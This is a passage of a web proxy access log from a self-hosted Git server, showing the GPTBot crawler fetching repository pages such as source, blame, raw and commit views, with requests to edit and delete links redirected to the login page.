"https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:05:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:05:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:05:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9788] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 14050] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9789] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 844] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx" -[17/Feb/2026:17:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 844] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:17:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9279] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 21954] [Gzip 10.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11077] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:05:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:17:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 74.7.227.38] [Length 11080] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11091] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:17:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:17:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11368] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" -[17/Feb/2026:17:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12810] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" -[17/Feb/2026:17:05:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:05:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481677] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" -[17/Feb/2026:17:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481680] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" -[17/Feb/2026:17:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56427] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" -[17/Feb/2026:17:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56425] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" -[17/Feb/2026:17:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481681] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" -[17/Feb/2026:17:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 11798] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" -[17/Feb/2026:17:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80" [Client 74.7.227.38] [Length 26388] [Gzip 5.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:17:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80" [Client 74.7.227.38] [Length 19895] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:17:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" [Client 74.7.227.38] [Length 12073] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:17:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" [Client 74.7.227.38] [Length 12074] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:17:06:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:17:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:17:06:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:17:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:17:06:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:17:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:17:06:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:17:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:17:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/keys.json?display=source" [Client 74.7.227.38] [Length 13023] [Gzip 2.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" -[17/Feb/2026:17:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=name&state=open" [Client 74.7.227.38] [Length 8487] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=name&state=closed" -[17/Feb/2026:17:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9812] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1%20copy.py" -[17/Feb/2026:17:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 11776] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:17:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 10951] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 